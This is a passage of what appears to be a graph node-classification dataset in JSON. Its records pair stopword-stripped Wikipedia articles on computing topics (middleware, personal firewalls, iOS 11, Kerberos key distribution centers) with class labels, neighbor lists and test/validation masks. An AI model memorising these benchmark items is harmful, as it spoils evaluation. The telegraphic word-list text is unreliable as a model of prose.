functional set application programming interfaces allow application compared operating system network services middleware offers unique technological advantages business industry example traditional database systems usually deployed closed environments users access system via restricted network intranet e.g. enterprise ’ internal network phenomenal growth world wide web users access virtually database proper access rights anywhere world middleware addresses problem varying levels interoperability among different database structures middleware facilitates transparent access legacy database management systems dbmss applications via web server without regard database-specific characteristics businesses frequently use middleware applications link information departmental databases payroll sales accounting databases housed multiple geographic locations highly competitive healthcare community laboratories make extensive use middleware applications data mining laboratory information system lis backup combine systems hospital mergers middleware helps bridge gap separate liss newly formed healthcare network following hospital buyout middleware help software developers avoid write application programming interfaces api every control program serving independent programming interface applications future internet network operation traffic monitoring multi-domain scenarios using mediator tools middleware powerful help since allow operators searchers service providers supervise quality service analyse eventual failures telecommunication services finally e-commerce uses middleware assist handling rapid secure transactions many different types computer environments short middleware become critical element across broad range industries thanks ability bring together resources across dissimilar networks computing platforms 2004 members european broadcasting union ebu carried study middleware respect system integration broadcast environments involved system design engineering experts 10 major european broadcasters working 12-month period understand effect predominantly software-based products media production broadcasting system design techniques resulting reports tech 3300 tech 3300s published freely available ebu web site message-oriented middleware mom middleware transactions event notifications delivered disparate systems components way messages often via enterprise messaging system mom messages sent client collected stored acted upon client continues processing intelligent middleware imw provides real-time intelligence event management intelligent agents imw manages real-time processing high volume sensor signals turns signals intelligent actionable business information actionable information delivered end-user power dashboards individual users pushed systems within outside enterprise able support various heterogeneous types hardware software provides api interfacing external systems highly scalable distributed architecture embeds intelligence throughout network transform raw data systematically actionable relevant knowledge also packaged tools view manage operations build advanced network applications effectively content-centric middleware offers simple provider-consumer abstraction applications issue requests uniquely identified content without worrying obtained juno one example allows applications generate content requests associated high-level delivery requirements middleware adapts underlying delivery access content sources best suited matching requirements therefore similar publish/subscribe middleware well content-centric networking paradigm sources include additional classifications ibm red hat oracle corporation microsoft vendors provide middleware software vendors axway sap tibco informatica objective interface systems pervasive scaleout software webmethods specifically founded provide niche middleware solutions groups apache software foundation opensaf objectweb consortium ow2 oasis amqp encourage development open source middleware microsoft .net framework architecture essentially middleware typical middleware functions distributed various products inter-computer interaction industry standards open apis rand software licence solace provides middleware purpose-built hardware implementations may experience scale stormmq provides message oriented middleware service",
    "neighbors": [
      1280,
      2948,
      7175,
      3848,
      9225,
      4107,
      10134,
      11673,
      7076,
      8100,
      10020,
      7983,
      8122,
      9665,
      11339,
      11596,
      2901,
      5210,
      479,
      225,
      9441,
      9455,
      6897,
      10486,
      119,
      2168,
      6522,
      3323,
      10236
    ],
    "mask": "Test"
  },
  {
    "node_id": 8752,
    "label": 4,
    "text": "National_Cyber_Security_Alliance:national cyber security alliance national cyber security alliance ncsa 501c 3 non-profit founded 2001 public private partnership working department homeland security dhs private sector sponsors founding sponsors included symantec cisco systems microsoft saic emc mcafee nonprofit collaborators promote cyber security awareness home users small medium size businesses primary secondary education national cyber security awareness month project ncsa us government stop think connect campaign broader public cyber security awareness anti-phishing working group department homeland security also involved facebook became member ncsa 2011 cisco systems joined ncsa board directors 2016 cisco represented anthony grieco leads company trust strategy office",
    "neighbors": [
      704,
      9569,
      7084,
      877,
      6834
    ],
    "mask": "Test"
  },
  {
    "node_id": 8753,
    "label": 4,
    "text": "Personal_firewall:personal firewall personal firewall application controls network traffic computer permitting denying communications based security policy typically works application layer firewall personal firewall differs conventional firewall terms scale personal firewall usually protect computer installed compared conventional firewall normally installed designated interface two networks router proxy server hence personal firewalls allow security policy defined individual computers whereas conventional firewall controls policy networks connects per-computer scope personal firewalls useful protect machines moved across different networks example laptop computer may used trusted intranet workplace minimal protection needed conventional firewall already place services require open ports file printer sharing useful laptop could used public wi-fi hotspots time decide level trust set individual security policies network unlike network firewalls many personal firewalls able control network traffic allowed programs secured computer application attempts outbound connection firewall may block blacklisted ask user whether blacklist yet known protects malware implemented executable program personal firewalls may also provide level intrusion detection allowing software terminate block connectivity suspects intrusion attempted common personal firewall features firewalls help protecting internal network hackers however firewall limitations mid 1990s part information security architecture project fortune 100 corporation united states anheuser-busch corporation one members three-man architectural development team came concept regards improving overall security operating system used computers within networked system network system referred budnet improving overall security operating system commonly referred os hardening member team charged ssgt donald r. woeltje jr. concept came installation special software firewall software every budnet server workstation perimeter security device indeed every single windows system budnet network concept commonly referred personal firewall software ssgt woeltje invent personal firewall software invent idea personal firewall evidence fact exists anheuser-busch security model proposal document made ssgt woeltje time ssgt woeltje brought leading firewall vendors meetings concerning products considered use perimeter security budnet network ssgt woeltje brought concept personal firewall vendors asked firewall product could used way exception representatives cyberguard corporation every vendor said firewall software could used way also said idea crazy unworkable today know wrong use personal firewall software become de facto computer security standard companies ssgt woeltje discussed personal firewall software among others cisco checkpoint axent technologies milkyway networks cyberguard network one trusted information systems secure computing corporation",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      1417,
      1163,
      3981,
      6797,
      9488,
      7955,
      1172,
      8724,
      9496,
      10392,
      3482,
      1436,
      4511,
      6431,
      6560,
      10531,
      5924,
      2213,
      550,
      8998,
      10790,
      939,
      1708,
      3243,
      3885,
      823,
      569,
      5178,
      6586,
      11577,
      2749,
      9279,
      5057,
      1858,
      10433,
      2244,
      11073,
      2118,
      11461,
      4814,
      9423,
      10574,
      7121,
      10451,
      10708,
      2005,
      4568,
      4953,
      9048,
      2907,
      4956,
      6364,
      7515,
      2783,
      4704,
      8032,
      9442,
      5860,
      3942,
      10987,
      8943,
      8816,
      9971,
      3700,
      4725,
      10872,
      1273,
      5245,
      2558,
      9983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8754,
    "label": 2,
    "text": "IOS_11:ios 11 ios 11 eleventh major release ios mobile operating system developed apple inc. successor ios 10 announced company worldwide developers conference june 5 2017 released september 19 2017 succeeded ios 12 september 17 2018 among ios 11 changes lock screen notification center combined allowing notifications displayed directly lock screen various pages control center unified gaining custom settings ability 3d touch icons options app store received visual overhaul focus editorial content daily highlights files file manager app allowed direct access files stored locally cloud services siri updated translate languages use privacy-minded on-device learning technique better understand user interests offer suggestions camera new settings improved portrait-mode photos utilised new encoding technologies reduce file sizes newer devices later release messages integrated icloud better synchronize messages across ios macos devices previous point release also added support person-to-person apple pay payments operating system also introduced ability record screen limited forms drag-and-drop functionality support augmented reality certain new features appeared ipad including always-accessible application dock cross-app drag-and-drop new user interface show multiple apps ios 11 received mixed reviews critics significantly praised application dock new multitasking interface ipad crediting renewing user experience praise directed redesigned control center offering customizable toggles though criticized lack third-party app support lack wi-fi network selection ability difficult usage small screen sizes along instability critics also noted new augmented reality development tools said impact would depend third-party apps fast developers embraced praise also directed app store redesign new file-management tools shortly release discovered disabling wi-fi bluetooth connections control center disable respective chips device order remain functional background connectivity design decision sparking criticism misleading users reducing security due potential vulnerabilities inactive open connections ios 11.2 update added warning messages new toggle color explain new functions ios 11 also received continuous criticism critics end-users perceived stability performance issues particularly older devices apple issued numerous software updates address issues dedicated ios 12 mainly toward stability performance improvements response two months release 52 ios devices running ios 11 slower adoption rate previous ios versions number increased 85 devices september 2018 june 4 2018 worldwide developers conference apple announced successor ios 12. ios 11 introduced apple worldwide developers conference keynote address june 5 2017 first developer beta version released keynote presentation first public beta released june 26 2017. ios 11 officially released september 19 2017. ios 11.0.1 released september 26 2017 first update ios 11 update contained bug fixes improvements including fix bug prevented emails sent exchange servers ios 11.0.2 released october 3 2017 mainly fixed crackling earpiece issue affected iphone 8 8 plus units ios 11.0.3 released october 11 2017 fixed issue audio haptic feedback iphone 7 7 plus issue iphone 6s touch input unresponsive device display serviced non-genuine apple parts ios 11.1 released october 31 2017 added 70 new emoji fixed krack wi-fi vulnerability reintroduced 3d touch multitasking gesture incorporated bug fixes ios 11.1.1 released november 9 2017 fixed keyboard autocorrect bug hey siri malfunction ios 11.1.2 released november 16 2017 fixed display issue iphone x screen would become unresponsive due rapid temperature drop well fixing issue distortion live photos videos captured iphone x. ios 11.2 released december 2 2017 added apple pay cash enabled faster 7.5w wireless charging introduced new live wallpapers iphone x two new pop-ups added explain new functionality wi-fi bluetooth control center toggles app store allows user pre-order app yet available app available app automatically downloaded tv app includes sports section update also included bug fixes calculator bug i.t autocorrect bug december 2 crash bug ios 11.2.1 released december 13 2017 update fixed remote access homekit devices following major security glitch also fixed camera autofocus iphone 8 8 plus x devices ios 11.2.2 released january 8 2018 update made changes safari webkit mitigate effects spectre attack ios 11.2.5 released january 23 2018 update fixed bugs added support homepod allows siri read news articles works us uk australia ios 11.2.6 released february 19 2018 update fixed bug caused applications crash processing particular character telugu script ios 11.3 released march 29 2018 update introduced battery health feature allows user disable performance throttling using older battery reveals issues iphone 6s battery recall ios 11.3 introduces new privacy icon displays whenever app using personal data update also includes arkit 1.5 gives better accuracy non-flat surfaces allows developers place objects vertical surfaces update adds new skeleton lion dragon bear animoji new health records feature allows patients view health records iphone available certain institutions new business chat feature allows customers interact certain business right messages app including customer support apple pay support added advanced mobile location supported countries ios 11.3.1 released april 24 2018 update improves security addresses issue touch input unresponsive iphone 8 devices serviced non-genuine displays ios 11.4 released may 29 2018 messages stored icloud airplay 2 brings support multi-room homepod speakers apple tv homepod stereo speaker pair pairs homepod syncing updating latest version command siri play song room ios 11.4.1 released july 9 2018 fixes issue prevented users viewing last known location airpods find phone app improves reliability syncing mail contacts notes exchange accounts lock screen notification center combined allowing users see notifications directly lock screen scrolling either show hide notifications control center redesign unifies pages allows users 3d touch long press devices without 3d touch buttons options sliders adjust volume brightness control center customizable via settings app allows settings shown including cellular service low power mode shortcut notes app siri intelligent personal assistant human voice supports language translation english chinese french german italian spanish available launch also support follow-up questions users users also able type siri siri able use on-device learning privacy-minded local learning technique understand user behavior interests inside different apps offer better suggestions recommendations new disturb driving mode lets users block unnecessary notifications long iphone connected vehicle bluetooth auto-reply feature sends specific reply senders messages let know user currently unavailable text passengers granted full notification access phone new smart invert feature dubbed dark mode publications inverts colors display except images apps user interface elements using iphone x utilizes oled technology news outlets reported feature conserve battery life turning pixels black saving energy preventing displaying white pixel users get expanded control apps location usage every app featuring using app location toggle settings differs previous ios versions apps required never always location options users remove rarely-used apps without losing app data using offload app button allows later reinstallation app available app store data returns usage continue users also apps removed automatically offload unused apps setting app offloaded app appears home screen grayed-out icon personalized suggestions help user free storage space device including emptying photos trash backing messages enabling icloud photo library backing photos videos certain new ios 11 features appear ipad application dock gets overhaul bringing closer design seen macos accessible screen letting users easily open apps split-screen view users also drag-and-drop files across different apps new multitasking interface shows multiple apps screen time floating windows additionally combination slide split view picture-in-picture modes users four active apps on-screen time letter ipad keyboard features alternative background number symbol accessible pulling respective key releasing control center visible multitasking window ipads running ios 11 9.7-inch 10.5-inch 2nd-generation 12.9-inch ipad pros flashlight support ios 11 introduces optical image stabilization flash photography high dynamic range portrait photos live photos receives new loop bounce long exposure effects uses high efficiency image file format decrease photo sizes devices apple a10 chip newer photos compressed new high efficiency image file format videos encoded new high efficiency video coding video compression format enabling improved quality also decreasing size half apple significantly changed wallpapers available use ios 11 initial beta version released apple developer conference apple included one new wallpaper removed six live animated fish wallpapers introduced iphone 6s 2015 ios 11.2 release later brought iphone x/8/8 plus-exclusive wallpapers older iphones iphone x exclusively features six live wallpapers seven new dynamic wallpapers ios 11 introduces native support qr code scanning camera app qr code positioned front camera notification created offering suggestions actions based scanned content twitter users far discovered joining wi-fi networks adding someone contacts list supported qr codes third-party keyboards add one-handed mode users able record screen natively order record screen users must first add feature control center settings app added users start stop recordings dedicated control center icon distinctly colored bar appearing top screen indicating active recording pressing bar gives option end recording videos saved photos app ios 11 device attempting connect wi-fi network nearby ios 11 macos high sierra devices already connected wirelessly send password streamlining connection process volume change overlay longer covers screen playing video smaller scrubber appears top right screen user takes screenshot thumbnail screenshot appear bottom left screen user tap thumbnail bring interface allows crop annotate delete screenshot third-party apps also able take advantage icloud keychain allow autofilling passwords user airline flight information viewed spotlight dedicated widget ios 11 switches top-left cellular network strength icons five dots four signal bars similar ios 7 new automatic setup feature aims simplify first-time setup new devices wireless transfer old new device transferring preferences apple id wi-fi info preferred settings icloud keychain passwords similar ipad drag-and-drop file support available iphone though limitations specifically supported within apps many apple pre-installed applications including notes contacts reminders maps app store redesigned home screen icons emergency sos feature added disables touch id pressing sleep/wake button five times quick succession prevents touch id working iphone passcode entered ios 11 adds support 8-bit 10-bit hevc devices apple a9 chip newer support hardware decoding older devices support software-based decoding empty space mail app users draw inline messages application synchronizes messages across ios macos icloud reflecting message deletion across devices feature temporarily removed fifth beta release returned may 29 2018 ios 11.4 released time ios 11 announcement june 2017 apple presented functionality letting users send person-to-person payments apple pay messages time ios 11 release september 2017 feature present removed earlier beta version apple announcing feature coming fall update ios 11 launched days ios 11.2 update went live although initially available united states new app drawer imessage apps aims simplify experience using apps stickers optimized storage system reduces backup size messages messages app also incorporates business chat feature businesses communicate directly customers app accessed message icon next search results businesses however feature included initial release ios 11 instead launching ios 11.3 messages app iphone x introduces face-tracking emoji called animoji animated emoji using face id app store receives complete redesign greater focus editorial content daily highlights design described cleaner consistent apps developed apple app design mimics design seen apple music app ios 10 select locations apple maps offer indoor maps shopping malls airports new lane guidance speed limit features aim guide drivers unfamiliar roads photos app ios 11 gains support viewing animated gifs users access gif images inside album titled animated memories viewed phone portrait orientation podcasts app receives redesign similar app store focus editorial content notes app built-in document scanner using device camera feature removes artifacts glare perspective instant notes feature ipad pro allows user start writing note lock screen putting apple pencil onto screen app also allows users input inline tables open space notes app user draw inline new files app lets users browse files stored device well stored across various cloud services including icloud drive dropbox onedrive google drive app supports organization structured sub-folders various file-based options files app also includes built-in player flac audio files files app available ipad iphone user flight information found safari app calculator app receives redesign rounded buttons replacing grid ones seen ios 7 new arkit application programming interface api lets third-party developers build augmented reality apps taking advantage device camera cpu gpu motion sensors arkit functionality available users devices apple a9 later processors according apple processors deliver breakthrough performance enables fast scene understanding lets build detailed compelling virtual content top real-world scenes new core ml software framework speed app tasks involving artificial intelligence image recognition new depth api allows third-party camera app developers take advantage iphone 7 plus iphone 8 plus iphone x dual-camera portrait mode let apps implement depth-sensing technology available default ios camera app simulate shallow depth-of-field new core nfc framework gives developers limited access near field communication nfc chip inside supported iphones opening potential use cases apps scan nearby environments give users information apps must compiled 64-bit architecture order supported ios 11 32-bit apps supported shown app store ios 11 users attempt open apps receive alert app incompatibility ios 11 drops native system integration twitter facebook flickr vimeo icloud drive app removed replaced files app ability trigger multitasking using 3d touch removed original ios 11 release response bug report apple engineer wrote please know feature intentionally removed apple software engineering chief craig federighi wrote reply email company temporarily drop support due technical constraint pledging bring back future update ios 11 brought back ios 11.1 ios 11.2 toggle switch wi-fi bluetooth unexpectedly changed completely turning two things temporarily next day real turn settings app dieter bohn verge liked new control center setup including customizable toggles 3d touch-expandable options writing panels 'm really impressed specifically highlighting apple tv remote possible replacement normal remote however note lack third-party access control center hope support future lack wi-fi network selection ability praised screen-recording functionality calling super neat bohn severely criticized notifications view writing serious disagreement apple manage elaborating prefers use screen much possible stating apple philosophy 'm trying way hard control speedy notifications bohn liked new files app new drag-and-drop functionality home screen enabling users drag multiple apps significantly praised multitasking ipad writing multitasking ipad near-revelatory experience enjoyed application dock ability place three apps screen freedom placement bohn conceded intuitive simple easy manipulate traditional windowing system like 'll get mac pc chromebook still praised radically powerful ever available ipad finally bohn praised siri improvements voice highlighted augmented reality allowing incredible games reiterated earlier sentiment ios 11 ambitious software update apple long time macworld jason snell wrote hype surrounding ios 11 justified snell praised new smoother transfer mode data settings old iphone new iphone referring previous experience manually frustrating exercise entering passwords repeatedly tapping long series questions activating deactivating numerous ios features also praised control center design calling great upgrade though also highlighting inability easily switch wi-fi networks snell noted app store design unchanged years received full redesign ios 11 wrote apple commitment editorial pages impressive making app store richer fun experience regarding introduction augmented reality stated apps using bad though also mind-blowingly good adding huge potential depended third-party apps using snell also praised improvements ipad experience including multitasking drag-and-drop across apps latter stated actually surpasses expectations due ease use review summarization states ios 11 apple ’ ambitious impressive upgrade years romain dillet techcrunch focused mostly ipad review writing ios 11 turns ipad completely different machine much efficient multitasking improved ease access application dock also praised design overhaul app store calling huge improvement compared previous app store also highlighted design changes apps including huge bold header name app section although acknowledged many tech friends told hate change dillet stated think people like ’ visually pleasing distinctive stated augmented reality become relevant days following ios 11 release third-party developers incorporate features apps praised apple creating arkit development tools makes much easier implement augmented reality features conclusion dillet wrote ten years ago ios started constrained operating system one biggest digital playgrounds devindra hardawar engadget stated focus ios 11 transforming ios something desktop-like many enhancements ipad leaving iphone bit behind mixed feelings control center writing small phone screen sizes feels like jumbled mess adding true comfort may present larger screens troubling situation owners non-plus devices however praised ability customize buttons including removing user never uses ability quickly record screen enable accessibility features called new app designs attractive favorably pointed new app drawer bottom conversations messages app referring big improvement messy interface last year praised siri improved voice photos app creating better memories new social features apple music though noting lack people social circle using service referencing ikea ikea place app uses augmented reality virtually place objects room significantly praised performance augmented reality technology iphone writing great job rendering furniture physical spaces using iphone 8 even impressively ran smoothly iphone 6s finally hardawar also enjoyed new functionality ipad calling multitasking application dock drag-and-drop dramatic changes highlighting particularly useful experience dragging internet content directly web new files app summarization recognized significant strides made ipad ios 11 writing shame ios 11 n't bring table iphone though acknowledging rise augmented reality november 2017 apple app store support page updated reflect 52 ios devices running ios 11 slower migration rate release ios 10 year prior saw 60 user adoption october 2016 number increased 59 devices december 2017 september 2017 jesus diaz fast company criticized design details ios 11 apple built-in apps adhering apple user interface guidelines headers aligned properly different apps elements centered different colors sizing caused diaz write comes software apple ’ attention detail crumbling away however also looked back history mentioning apple music original design lack optical typography alignment calendar app previously-fixed ios design mistakes ported macos software established inconsistency lack attention detail new apple firmly stated perhaps inevitable given monumental task update operating system every year company claims obsessive attention detail acceptable november 2017 gizmodo adam clark estes wrote extensively software bugs product imperfections experienced using ios 11 estes pointed issues keyboard covering messages disappearing reply field messages app letter converting unicode symbol screen becoming unresponsive writing new operating system turned phone bug-infested carcass former self frustration trying use sometimes makes want die also wrote aspect technology becoming advanced sophisticated explaining back iphone 4 came ... smartphones lot simpler cameras joyfully crappy screens small number apps could download things could connect paltry compared today ... expect bugs guess complex pieces technology contain points failure ’ oversimplifying issue concluded theorizing technological development writing however trying understand exactly life computers veered dramatically days windows 95 nothing worked right golden age iphone 4 everything seemed perfect handful ios bugs make feel like world falling apart ... maybe ’ annoying thing whiny one ’ upset nothing seems perfect maybe maybe apple slipping wrong trust along shortly ios 11 released vice motherboard discovered new behaviors wi-fi bluetooth toggles control center users tap turn features ios 11 disconnects chips active connections disable respective chips device report states feature bug referencing documentation pages apple confirming new toggle behaviors means disconnect connections remain active airdrop transfers airplay streaming apple pencil input handoff features security researcher andrea barisani told motherboard new user interface obvious making user experience uncomfortable october 2017 electronic frontier foundation published article calling interface misleading bad user security due higher risk security vulnerabilities wi-fi bluetooth chips activated active use foundation recommended apple fix loophole connectivity writing simply question communicating better users giving control clarity want settings off-ish ios 11.2 changes behavior slightly turning toggles white showing warning message explains functions toggles control center toggles turned users experienced battery drain problems updating ios 11 poll website 70 9to5mac visitors reported decreased battery life updating new operating system however article featuring twitter complaints battery life daily express wrote honestly expected happens every year completely normal major ios releases hammer battery device much faster first days use forbes stating article days install new version ios idevice busy sorts housekeeping practically apps updates ios busy downloading installing background ... additionally install new version ios something called re-indexing process ios 11 comb data device cataloged quick spotlight searching article states good news things temporary within week launch 11.3.1 update users began reporting continued issues update regarding battery drainage reports indicated drains 57 3 3 minutes even users health battery measuring 96 noticed iphones draining around 1 per minute addition battery drains iphone users noticed devices excessive heat buildup recommended technology experts users upgrade software release version subsequent 11.3.1 unless specifically plagued 'third party display issue october 2017 users reported reddit quickly typing equation built-in ios calculator app gives incorrect answers notably making query 1+2+3 result 24 rather 6 analysts blamed animation lag caused redesign app ios 11 problem worked around typing numbers slowly downloading alternative calculator apps app store problem large amount bug reports filed apple employee chris espinosa indicated twitter company aware issue ios 11.2 fixed issue november 2017 users reported bug default ios keyboard pressing resulted system rendering text along incomprehensible symbol featuring question mark box symbol known variation selector 16 intended purpose merging two characters emoji apple acknowledged issue support document advising users set text replacement feature device keyboard settings temporary workaround company confirmed wall street journal devices using older ios 11 versions opposed latest 11.1 version time publication affected issue apple spokesperson announced fix released soon ios 11.1.1 released november 9 2017 fixing issue end month another keyboard autocorrection bug reported time replacing word i.t macrumors suggested users set text replacement feature way earlier autocorrection issue though report notes users insist solution solve problem fixed release ios 11.2 early december users wrote twitter reddit exactly 12:15 a.m. local time december 2 app store app sends local notifications would cause device repeatedly restart reddit users reported disabling notifications turning background app refresh would stop issue apple staff twitter reported bug date handling recommending users manually set date prior december 2 macrumors wrote issue looks like limited devices running ios 11.1.2 users 11.2 beta release affected ios 11.2 released day fixed issue december 2017 9to5mac uncovered security vulnerability ios 11.2 within apple homekit smart home system allowing unauthorized access smart locks garage door openers noted apple already issued server-side fix preventing unauthorized access also limited homekit functionality upcoming software fix ios operating system intended restore lost functionality december 13 apple released ios 11.2.1 fixed limitation remote access ios 11 drops support devices 32-bit processor specifically iphone 5 iphone 5c fourth-generation ipad first version ios run exclusively ios devices 64-bit processors",
    "neighbors": [
      10755,
      5636,
      9732,
      1549,
      4111,
      4623,
      5647,
      7697,
      6675,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      5181,
      8253,
      8767,
      576,
      5696,
      8774,
      1608,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      3167,
      3681,
      9826,
      8806,
      3691,
      1134,
      8304,
      2673,
      7292,
      2686,
      6783,
      10878,
      7307,
      5784,
      1177,
      3228,
      2207,
      10406,
      11430,
      3241,
      5292,
      2735,
      3248,
      4283,
      3772,
      7869,
      7378,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      6377,
      9451,
      1772,
      4844,
      9964,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      1290,
      3338,
      9487,
      784,
      10512,
      3858,
      4374,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      10052,
      7496,
      4957,
      6495,
      9063,
      3948,
      10608,
      5492,
      2432,
      2439,
      6023,
      7561,
      11656,
      6539,
      7052,
      7057,
      3483,
      2979,
      9123,
      11171,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      5078,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      487,
      488,
      5100,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 8755,
    "label": 4,
    "text": "Von_Duprin:von duprin von duprin brand security products producer first panic bar style door mechanism allows door public building locked outside still easy exit inside 1903 iroquois theatre fire chicago claimed lives almost 600 people carl prinzler supposed attend show theatre fateful day however business dealings called elsewhere era common theatres like lock interior exterior doors prevent non-paying persons entering also inhibited persons inside exiting case iroquois theatre fire doors locked and/or bolted prevented patrons exiting causing burned alive succumb smoke inhalation prinzler astounded enormous senseless loss life night sought way doors public facilities locked outside allow egress inside minimal effort emergency prinzler tapped architectural engineering abilities henry h. dupont develop product 1908 first model panic bar style egress device released vonnegut hardware company utilized market owing joint effort develop sell product sold name von duprin combination names vonnegut dupont prinzler popular 88 series crossbar exit devices still manufactured von duprin look similar original design although significant engineering changes made von duprin continues manufacture security related products brand allegion plc",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8756,
    "label": 7,
    "text": "HP_Business_Service_Automation:hp business service automation hp business service automation collection software products data center automation hp software division hewlett-packard company products could help information technology departments create common enterprise-wide view business service enable automation change compliance across devices make business service connect processes coordinate teams via common workflows integrate monitoring ticketing tools form complete integrated business service management solution hp provides many capabilities part hp business service management software solutions longer competes past practices cost structures competes costs structures cloud computing software service saas providers hosts remain competitive determine retain outsource needs make systems applications perform better efficiently also needs automate applications systems keep complexity costs line visibility automation management essential regardless underlying infrastructure also allow function best broker services regardless servers may reside efficiencies type integration automation management led rise converged infrastructure environments type data center environment allows enterprises get applications running faster easier manageability less maintenance enables rapidly adjust resources servers storage networking meet fluctuating unpredictable business demand hp business service automation consisted several software products encompassed data center automation client automation runtime visibility control data center hp server automation software automates server lifecycle physical virtual servers automates deployment applications hp application deployment manager adm software automated release process bridge gap among development quality assurance operations teams hp network automation software delivers network change configuration management real-time visibility automation control network compliance security cost savings hp operations orchestration software process automation platform provides single view automating processes hybrid infrastructures including cloud computing environments hp radia client automation software persistent systems automates key processes across pc lifecycle hp storage essentials software standards-based storage resource management software provides visibility applications drilling host storage infrastructure hp database middleware automation software acquisition stratavia automates provisioning patching compliance configuration management heterogeneous databases application servers hp service automation visualizer software presented global interactive picture environment including servers software network devices storage configurations interdependencies hp business service automation bsa essentials provides content infrastructure services users includes portal security updates compliance policy checks content application management profiles bsa essentials reporting reporting engine ad hoc cross-domain analysis compliance reports",
    "neighbors": [
      5384,
      4194,
      467,
      10797
    ],
    "mask": "Test"
  },
  {
    "node_id": 8757,
    "label": 7,
    "text": "Microsoft_Egypt:microsoft egypt microsoft egypt division microsoft markets microsoft products egypt microsoft established branch egypt 1995 office representative becoming limited liability company 1997 microsoft launched cairo microsoft innovation center september 2007 located smart village near cairo mission work concept-level research problems relatively short market headed tarek el-abbadi long time program manager microsoft redmond office",
    "neighbors": [
      259,
      4356,
      11524,
      6150,
      6797,
      782,
      1935,
      10900,
      3605,
      11030,
      3224,
      11549,
      7838,
      7456,
      929,
      5666,
      3875,
      7970,
      11559,
      1832,
      6441,
      6827,
      7215,
      3890,
      11060,
      7359,
      4289,
      194,
      3527,
      9033,
      6476,
      10957,
      4816,
      4051,
      9812,
      11221,
      11605,
      4439,
      11103,
      4704,
      10338,
      740,
      2919,
      9448,
      617,
      8681,
      9585,
      7796,
      6265,
      1916
    ],
    "mask": "Test"
  },
  {
    "node_id": 8758,
    "label": 5,
    "text": "Comparison_of_instant_messaging_protocols:comparison instant messaging protocols following comparison instant messaging protocols contains basic general information protocols note 1 part known hostmask either server connected cloak granted server administrator realistic example tilde generally indicates username provided irc client signon verified ident service note 2 part resource distinguishes user logged multiple locations possibly simultaneously realistic example note 3 scalability issue protocol gets increasingly inefficient number contacts note 4 one-to-many/many-to-many communications primarily comprise presence information publish/subscribe groupchat distribution technologies ability distribute data multicast avoiding bottlenecks sending side caused number recipients efficient distribution presence currently however technological scalability issue xmpp sip/simple note 5 reports users antispam filter used censor links im programs websites note 6 serverless protocols n't central entities usually companies controlling network serverless network consists clients systems usually extremely resistant surveillance censorship",
    "neighbors": [
      10242,
      5251,
      3460,
      5382,
      11399,
      9225,
      4746,
      8331,
      1036,
      11408,
      3610,
      3228,
      8735,
      10271,
      3105,
      9511,
      1962,
      9519,
      1467,
      6208,
      1218,
      2373,
      6982,
      6855,
      2760,
      1738,
      2892,
      6098,
      3284,
      1754,
      4318,
      3812,
      4068,
      6628,
      9572,
      488,
      3959,
      7928,
      10748
    ],
    "mask": "None"
  },
  {
    "node_id": 8759,
    "label": 0,
    "text": "Language_identification:language identification natural language processing language identification language guessing problem determining natural language given content computational approaches problem view special case text categorization solved various statistical methods several statistical approaches language identification using different techniques classify data one technique compare compressibility text compressibility texts set known languages approach known mutual information based distance measure technique also used empirically construct family trees languages closely correspond trees constructed using historical methods mutual information based distance measure essentially equivalent conventional model-based methods generally considered either novel better simpler techniques another technique described cavnar trenkle 1994 dunning 1994 create language n-gram model training text languages models based characters cavnar trenkle encoded bytes dunning latter language identification character encoding detection integrated piece text needing identified similar model made model compared stored language model likely language one model similar model text needing identified approach problematic input text language model case method may return another similar language result also problematic approach pieces input text composed several languages common web recent method see řehůřek kolkus 2009 method detect multiple languages unstructured piece text works robustly short texts words something n-gram approaches struggle older statistical method grefenstette based prevalence certain function words e.g. english one great bottlenecks language identification systems distinguish closely related languages similar languages like serbian croatian indonesian malay present significant lexical structural overlap making challenging systems discriminate recently dsl shared task organized providing dataset tan et al. 2014 containing 13 different languages language varieties six language groups group bosnian croatian serbian group b indonesian malaysian group c czech slovak group brazilian portuguese european portuguese group e peninsular spain argentine spanish group f american english british english best system reached performance 95 results goutte et al. 2014 results dsl shared task described zampieri et al 2014",
    "neighbors": [
      5218,
      10114,
      7780,
      1044,
      7164
    ],
    "mask": "None"
  },
  {
    "node_id": 8760,
    "label": 4,
    "text": "Key_distribution_center:key distribution center cryptography key distribution center kdc part cryptosystem intended reduce risks inherent exchanging keys kdcs often operate systems within users may permission use certain services times others instance administrator may established policy certain users may back tape many operating systems control access tape facility via system service system service restricts tape drive operate behalf users submit service-granting ticket wish use remains task distributing tickets appropriately permitted users ticket consists includes key one term mechanism distributes kdc usually situations kdc also operates system service typical operation kdc involves request user use service kdc use cryptographic techniques authenticate requesting users also check whether individual user right access service requested authenticated user meets prescribed conditions kdc issue ticket permitting access kdcs mostly operate symmetric encryption cases kdc shares key parties kdc produces ticket based server key client receives ticket submits appropriate server server verify submitted ticket grant access user submitting security systems using kdcs include kerberos actually kerberos partitions kdc functionality two different agents authentication server tgs ticket granting service",
    "neighbors": [
      5568,
      513,
      168,
      4490,
      4874,
      7983,
      6098,
      2932,
      1012,
      10677
    ],
    "mask": "None"
  },
  {
    "node_id": 8761,
    "label": 3,
